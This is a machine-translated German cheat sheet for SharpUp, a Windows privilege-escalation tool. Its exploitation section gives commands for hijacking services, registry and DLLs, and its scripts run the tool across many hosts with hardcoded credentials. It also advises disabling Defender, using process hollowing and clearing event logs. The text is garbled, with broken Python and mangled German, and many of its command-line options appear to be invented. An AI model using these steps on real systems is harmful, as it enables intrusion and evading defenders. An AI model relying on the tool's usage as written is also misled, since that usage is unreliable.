SharpUp Cheat Blatt
Überblick
SharpUp ist ein C#-Port des beliebten PowerUp Privileg Escalation Enumeration Skript, entworfen, um gemeinsame Windows Privileg Escalation Vektoren durch umfassende Systemanalyse zu identifizieren. Entwickelt im Rahmen des GhostPack Toolkits von harmj0y und anderen Sicherheitsforschern bietet SharpUp Penetrationsprüfer und rote Teambetreiber mit einem leistungsstarken Werkzeug zur Entdeckung von Fehlkonfigurationen und Schwachstellen, die zu lokalen Privilegien Escalation auf Windows-Systemen führen könnten. Das Tool stellt eine moderne Herangehensweise an Privileg Escalation Enumeration, die die . NET-Rahmen für verbesserte Stealth und Kompatibilität.
Der Hauptvorteil von SharpUp über seinen PowerShell Vorgänger liegt in seiner kompilierten Natur, die es weniger anfällig für PowerShell-basierte Erkennungsmechanismen und Skriptausführungsrichtlinien macht. Als eigenständige Ausführung kann SharpUp problemlos in Umgebungen eingesetzt und ausgeführt werden, in denen die PowerShell-Ausführung eingeschränkt oder stark überwacht wird. Das Tool führt umfangreiche Überprüfungen in mehreren Kategorien durch, einschließlich Service-Misskonfigurationen, Registrierungslücken, Dateisystemberechtigungen und verschiedene Windows-spezifische Privileg Escalation Techniken.
SharpUp arbeitet durch systematische Prüfung des Zielsystems für allgemeine Privileg Eskalationsvektoren, einschließlich nicht zitierte Service-Pfade, schwache Service-Berechtigungen, Registry Autoruns, DLL-Hijacking-Möglichkeiten, und verschiedene andere Fehlkonfigurationen, die genutzt werden könnten, um erhöhte Privilegien zu gewinnen. Das Tool bietet detaillierte Ausgabe, die Sicherheitsexperten hilft verstehen nicht nur, welche Schwachstellen existieren, sondern auch, wie sie ausgenutzt werden könnten, so dass es ein unschätzbares Vermögen für Offensive und Verteidigungssicherheitsoperationen.
Installation
Binärer Download
Vorkompilierte Downloads Sharp Auf Lager:
```bash
Download from GitHub releases
wget https://github.com/GhostPack/SharpUp/releases/latest/download/SharpUp.exe
Download specific version
wget https://github.com/GhostPack/SharpUp/releases/download/v1.1.0/SharpUp.exe
Verify file integrity
sha256sum SharpUp.exe
Make executable (if needed)
chmod +x SharpUp.exe ```_
Quelle Compilation
Sharp kompilieren Von der Quelle:
```bash
Clone repository
git clone https://github.com/GhostPack/SharpUp.git cd SharpUp
Compile with Visual Studio
msbuild SharpUp.sln /p:Configuration=Release
Compile with .NET CLI
dotnet build -c Release
Cross-compile for different architectures
dotnet publish -c Release -r win-x64 --self-contained dotnet publish -c Release -r win-x86 --self-contained ```_
Docker bauen Umwelt
```bash
Create Docker build environment
cat > Dockerfile << 'EOF' FROM mcr.microsoft.com/dotnet/sdk:6.0 WORKDIR /app COPY . . RUN dotnet build -c Release EOF
Build container
docker build -t sharpup-builder .
Extract compiled binary
docker run --rm -v $(pwd):/output sharpup-builder cp /app/bin/Release/net6.0/SharpUp.exe /output/ ```_
Basisnutzung
Standardzählung
Einfache SharpUp-Enumeration:
```bash
Run all checks
SharpUp.exe
Run with verbose output
SharpUp.exe -v
Run specific check categories
SharpUp.exe -c Services
Run multiple categories
SharpUp.exe -c Services,Registry
Save output to file
SharpUp.exe > privilege_escalation_report.txt ```_
Gezielte Überprüfungen
Durchführung spezifischer Privileg Eskalation Kontrollen:
```bash
Check service permissions
SharpUp.exe -c Services
Check registry autoruns
SharpUp.exe -c Registry
Check file permissions
SharpUp.exe -c Files
Check scheduled tasks
SharpUp.exe -c Tasks
Check installed software
SharpUp.exe -c Software ```_
Ausgabeformatierung
Controlling Sharp Ausgabeformat:
```bash
JSON output format
SharpUp.exe -f json
XML output format
SharpUp.exe -f xml
CSV output format
SharpUp.exe -f csv
Detailed text output
SharpUp.exe -f detailed
Quiet mode (minimal output)
SharpUp.exe -q ```_
Erweiterte Funktionen
Service Enumeration
Umfassende Service Privileg Escalation prüft:
```bash
Check unquoted service paths
SharpUp.exe -c Services -t UnquotedPaths
Check weak service permissions
SharpUp.exe -c Services -t WeakPermissions
Check service binary permissions
SharpUp.exe -c Services -t BinaryPermissions
Check service registry permissions
SharpUp.exe -c Services -t RegistryPermissions
Check all service vulnerabilities
SharpUp.exe -c Services -t All ```_
Systemanalyse
Registrierungsbasierte Privileg Escalation Enumeration:
```bash
Check autorun entries
SharpUp.exe -c Registry -t Autoruns
Check registry permissions
SharpUp.exe -c Registry -t Permissions
Check AlwaysInstallElevated
SharpUp.exe -c Registry -t AlwaysInstallElevated
Check registry hijacking opportunities
SharpUp.exe -c Registry -t Hijacking
Check all registry vulnerabilities
SharpUp.exe -c Registry -t All ```_
Dateisystem überprüft
Dateisystem Privileg Escalation Enumeration:
```bash
Check writable directories in PATH
SharpUp.exe -c Files -t WritablePath
Check DLL hijacking opportunities
SharpUp.exe -c Files -t DLLHijacking
Check file permissions
SharpUp.exe -c Files -t Permissions
Check backup files
SharpUp.exe -c Files -t Backups
Check configuration files
SharpUp.exe -c Files -t ConfigFiles ```_
Geplant Aufgabenanalyse
Scheduled Task Privileg Escalation Kontrollen:
```bash
Check scheduled task permissions
SharpUp.exe -c Tasks -t Permissions
Check task binary permissions
SharpUp.exe -c Tasks -t BinaryPermissions
Check task arguments
SharpUp.exe -c Tasks -t Arguments
Check task triggers
SharpUp.exe -c Tasks -t Triggers
Check all task vulnerabilities
SharpUp.exe -c Tasks -t All ```_
Exploitation Techniken
Service Exploitation
Nutzung servicebasierter Schwachstellen:
```bash
Exploit unquoted service path
sc stop "Vulnerable Service" copy malicious.exe "C:\Program Files\Vulnerable Path\Program.exe" sc start "Vulnerable Service"
Exploit weak service permissions
sc config "Vulnerable Service" binpath= "C:\temp\malicious.exe" sc start "Vulnerable Service"
Exploit service binary permissions
copy malicious.exe "C:\Program Files\Service\service.exe" sc start "Vulnerable Service" ```_
Registrierung Exploitation
Nutzung von Registrierungs-basierten Schwachstellen:
```bash
Exploit AlwaysInstallElevated
msiexec /quiet /qn /i malicious.msi
Exploit autorun registry entry
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Malicious" /t REG_SZ /d "C:\temp\malicious.exe"
Exploit registry permissions
reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnService" /v "ImagePath" /t REG_EXPAND_SZ /d "C:\temp\malicious.exe" ```_
DLL Hijacking
Exploiting DLL-Hijacking Möglichkeiten:
```bash
Create malicious DLL
Compile DLL with appropriate exports
gcc -shared -o malicious.dll malicious.c
Place DLL in hijackable location
copy malicious.dll "C:\Program Files\Application\vulnerable.dll"
Trigger application execution
"C:\Program Files\Application\app.exe" ```_
Automatisierungsskripte
Automatisierte Zählung
```bash
!/bin/bash
SharpUp automated enumeration script
TARGET_HOST="192.168.1.100" USERNAME="user" PASSWORD="password"
echo "Starting SharpUp enumeration on $TARGET_HOST"
Copy SharpUp to target
smbclient //$TARGET_HOST/C$ -U $USERNAME%$PASSWORD -c "put SharpUp.exe temp\SharpUp.exe"
Execute SharpUp remotely
winexe -U $USERNAME%$PASSWORD //$TARGET_HOST "C:\temp\SharpUp.exe -f json > C:\temp\sharpup_results.json"
Retrieve results
smbclient //$TARGET_HOST/C$ -U $USERNAME%$PASSWORD -c "get temp\sharpup_results.json sharpup_results_$TARGET_HOST.json"
Clean up
smbclient //$TARGET_HOST/C$ -U $USERNAME%$PASSWORD -c "del temp\SharpUp.exe; del temp\sharpup_results.json"
echo "Enumeration completed for $TARGET_HOST" ```_
Ergebnisanalyse
```python
!/usr/bin/env python3
SharpUp result analysis script
import json import sys
def analyze_sharpup_results(json_file): """Analyze SharpUp JSON results"""
with open(json_file, 'r') as f:
results = json.load(f)
vulnerabilities = []
# Analyze service vulnerabilities
if 'Services' in results:
for service in results['Services']:
if service.get('Vulnerable', False):
vulnerabilities.append(\\\\{
'type': 'Service',
'name': service['Name'],
'issue': service['Issue'],
'severity': service.get('Severity', 'Medium')
\\\\})
# Analyze registry vulnerabilities
if 'Registry' in results:
for reg_entry in results['Registry']:
if reg_entry.get('Vulnerable', False):
vulnerabilities.append(\\\\{
'type': 'Registry',
'path': reg_entry['Path'],
'issue': reg_entry['Issue'],
'severity': reg_entry.get('Severity', 'Medium')
\\\\})
# Sort by severity
severity_order = \\\\{'Critical': 0, 'High': 1, 'Medium': 2, 'Low': 3\\\\}
vulnerabilities.sort(key=lambda x: severity_order.get(x['severity'], 4))
# Generate report
print("SharpUp Vulnerability Analysis Report")
print("=" * 50)
for vuln in vulnerabilities:
print(f"Type: \\\\{vuln['type']\\\\}")
print(f"Severity: \\\\{vuln['severity']\\\\}")
print(f"Issue: \\\\{vuln['issue']\\\\}")
if 'name' in vuln:
print(f"Service: \\\\{vuln['name']\\\\}")
if 'path' in vuln:
print(f"Path: \\\\{vuln['path']\\\\}")
print("-" * 30)
if name == "main":
if len(sys.argv) != 2:
print("Usage: python3 analyze_results.py
analyze_sharpup_results(sys.argv[1])
```_
Massenaufzählung
```python
!/usr/bin/env python3
SharpUp mass enumeration script
import subprocess import threading import json import time
class SharpUpScanner: def init(self, targets_file, username, password): self.targets = self.load_targets(targets_file) self.username = username self.password = password self.results = \\{\\}
def load_targets(self, targets_file):
"""Load target hosts from file"""
with open(targets_file, 'r') as f:
return [line.strip() for line in f if line.strip()]
def scan_target(self, target):
"""Scan individual target with SharpUp"""
try:
print(f"Scanning \\\\{target\\\\}...")
# Copy SharpUp to target
copy_cmd = f"smbclient //\\\\{target\\\\}/C$ -U \\\\{self.username\\\\}%\\\\{self.password\\\\} -c 'put SharpUp.exe temp\\SharpUp.exe'"
subprocess.run(copy_cmd, shell=True, capture_output=True)
# Execute SharpUp
exec_cmd = f"winexe -U \\\\{self.username\\\\}%\\\\{self.password\\\\} //\\\\{target\\\\} 'C:\\temp\\SharpUp.exe -f json'"
result = subprocess.run(exec_cmd, shell=True, capture_output=True, text=True)
if result.returncode == 0:
self.results[target] = json.loads(result.stdout)
print(f"Successfully scanned \\\\{target\\\\}")
else:
print(f"Failed to scan \\\\{target\\\\}: \\\\{result.stderr\\\\}")
# Cleanup
cleanup_cmd = f"smbclient //\\\\{target\\\\}/C$ -U \\\\{self.username\\\\}%\\\\{self.password\\\\} -c 'del temp\\SharpUp.exe'"
subprocess.run(cleanup_cmd, shell=True, capture_output=True)
except Exception as e:
print(f"Error scanning \\\\{target\\\\}: \\\\{e\\\\}")
def run_scan(self, max_threads=10):
"""Run scan against all targets"""
threads = []
for target in self.targets:
if len(threads) >= max_threads:
# Wait for threads to complete
for t in threads:
t.join()
threads = []
thread = threading.Thread(target=self.scan_target, args=(target,))
thread.start()
threads.append(thread)
time.sleep(1) # Avoid overwhelming targets
# Wait for remaining threads
for t in threads:
t.join()
return self.results
Usage
if name == "main": scanner = SharpUpScanner("targets.txt", "admin", "password123") results = scanner.run_scan()
# Save results
with open("mass_sharpup_results.json", "w") as f:
json.dump(results, f, indent=2)
print(f"Scan completed. Results saved for \\\\{len(results)\\\\} targets.")
```_
Integrationsbeispiele
Metasploit Integration
```ruby
Metasploit post-exploitation module for SharpUp
require 'msf/core' require 'rex'
class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File
def initialize(info = \\{\\}) super(update_info(info, 'Name' => 'Windows SharpUp Privilege Escalation Enumeration', 'Description' => 'Runs SharpUp to enumerate privilege escalation vectors', 'License' => MSF_LICENSE, 'Author' => ['Your Name'], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'] )) end
def run print_status("Running SharpUp enumeration...")
# Upload SharpUp
sharpup_path = "#\\\\{session.fs.file.expand_path("%TEMP%")\\\\}\\SharpUp.exe"
upload_file(sharpup_path, File.join(Msf::Config.data_directory, "exploits", "SharpUp.exe"))
# Execute SharpUp
output = cmd_exec("#\\\\{sharpup_path\\\\} -f json")
# Parse and display results
begin
results = JSON.parse(output)
print_good("SharpUp enumeration completed")
# Process results
if results['Services']
print_status("Service vulnerabilities found:")
| results['Services'].each do | service | | if service['Vulnerable'] print_good(" #\\{service['Name']\\}: #\\{service['Issue']\\}") end end end
rescue JSON::ParserError
print_error("Failed to parse SharpUp output")
end
# Cleanup
file_rm(sharpup_path)
end end ```_
Integration von PowerShell
```powershell
PowerShell wrapper for SharpUp
function Invoke-SharpUpEnum \\{ param( [string]$SharpUpPath = ".\SharpUp.exe", [string]$OutputFormat = "json", [string]$Categories = "All", [switch]$Verbose )
Write-Host "[+] Starting SharpUp enumeration" -ForegroundColor Green
# Build command arguments
$arguments = @()
if ($Categories -ne "All") \\\\{
$arguments += "-c", $Categories
\\\\}
if ($OutputFormat) \\\\{
$arguments += "-f", $OutputFormat
\\\\}
if ($Verbose) \\\\{
$arguments += "-v"
\\\\}
try \\\\{
# Execute SharpUp
$result = & $SharpUpPath @arguments 2>&1
if ($LASTEXITCODE -eq 0) \\\\{
Write-Host "[+] SharpUp completed successfully" -ForegroundColor Green
if ($OutputFormat -eq "json") \\\\{
$jsonResult = $result|ConvertFrom-Json
return $jsonResult
\\\\} else \\\\{
return $result
\\\\}
\\\\} else \\\\{
Write-Host "[-] SharpUp failed with exit code: $LASTEXITCODE" -ForegroundColor Red
Write-Host $result -ForegroundColor Red
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Error executing SharpUp: $($_.Exception.Message)" -ForegroundColor Red
\\\\}
\\}
Usage examples
$results = Invoke-SharpUpEnum -Verbose $serviceVulns = Invoke-SharpUpEnum -Categories "Services" -OutputFormat "json" ```_
Fehlerbehebung
Gemeinsame Themen
** Einschränkungen der Ausführungspolitik:** ```bash
Check execution policy
powershell Get-ExecutionPolicy
Bypass execution policy
powershell -ExecutionPolicy Bypass -File script.ps1
Use alternative execution methods
rundll32.exe shell32.dll,ShellExec_RunDLL SharpUp.exe ```_
Permissionsfragen: ```bash
Check current privileges
whoami /priv
Run as different user
runas /user:domain\user SharpUp.exe
Use PsExec for remote execution
psexec \target -u user -p password SharpUp.exe ```_
** Antivirus Erkennung:** ```bash
Check Windows Defender status
powershell Get-MpComputerStatus
Disable real-time protection (if authorized)
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Use obfuscation techniques
Recompile with different signatures
Use process hollowing or injection
```_
Debugging
Debugging aktivieren:
```bash
Run with verbose output
SharpUp.exe -v
Capture detailed logs
SharpUp.exe -v > debug.log 2>&1
Use Process Monitor to track file/registry access
procmon.exe
Use Sysmon for detailed logging
sysmon -i sysmonconfig.xml ```_
Sicherheitsüberlegungen
Operationelle Sicherheit
** Nachweisvermeidung:** - Verwenden Sie legitim aussehende Dateinamen - Betriebszeiten - Verdächtige Prozessnamen vermeiden - Artefakte nach der Ausführung reinigen - Monitor für defensive Antworten
**Artifact Management: ** - Sicheres Löschen von Binaries - Löschen von Ereignisprotokollen, wenn möglich - Entfernen temporäre Dateien - Befehlsverlauf löschen - Monitor für forensische Analyse
Rechtliche und ethische Überlegungen
Authorized Testing Only: - ordnungsgemäße schriftliche Genehmigung erhalten - Definieren Sie klare Grenzen - Alle Aktivitäten - Verantwortliche Offenlegung - Überprüfung der Systemintegrität
Beste Praktiken: - Verwendung in kontrollierten Umgebungen - Regelmäßige Sicherheitsbewertungen - Durchführung von Sanierungsmaßnahmen - Monitor für unbefugte Nutzung - Bewahren Sie Audit-Strecken
Referenzen
- SharpUp GitHub Repository
- (__LINK_5___)
- [Windows Privilege Escalation Guide](LINK_5
- [MITRE ATT&CK; - Privilege Escalation](__LINK_5___
- [Windows Security Hardening](_LINK_5__